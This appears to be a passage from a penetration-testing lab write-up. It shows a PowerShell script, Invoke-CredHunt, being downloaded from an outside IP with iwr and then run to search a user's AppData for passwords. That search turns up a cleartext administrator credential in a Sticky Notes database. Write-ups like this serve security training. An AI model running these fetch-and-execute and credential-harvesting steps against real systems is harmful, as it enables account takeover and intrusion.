Credential Hunt
Attempting to look for hidden credential using Invoke-Credhunt after performing a manual enumeration.
PS C:\Users\Jeff> iwr -Uri http://192.168.45.182/Invoke-CredHunt.ps1 -OutFile .\Invoke-CredHunt.ps1
PS C:\Users\Jeff> . .\Invoke-CredHunt.ps1Transferred and imported Invoke-Credhunt
PS C:\Users\Jeff> Invoke-CredHunt -Path C:\Users\Jeff\AppData -Keyword password,administrator -Exclude *.dll,*.exe
[...REDACTED...]
================================================================================
FILE: C:\Users\Jeff\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite
================================================================================
LINE 95:
-> POS 41: \id=a6c52b67-f266-45ff-9aaf-5ccbe22f7d45 Administrator:MySupersecurePassword2112ManagedPosition=Yellow983b5947-15eb-4375-97
f6-2d646a91dba42fa3c77f-fd17-442c-a2e8-11cd97ffdbb��"�e��=,
-> POS 68: \id=a6c52b67-f266-45ff-9aaf-5ccbe22f7d45 Administrator:MySupersecurePassword2112ManagedPosition=Yellow983b5947-15eb-4375-97
f6-2d646a91dba42fa3c77f-fd17-442c-a2e8-11cd97ffdbb��"�e��=,
[...REDACTED...]A CLEARTEXT credential of the administrator account identified; MySupersecurePassword2112
Validating..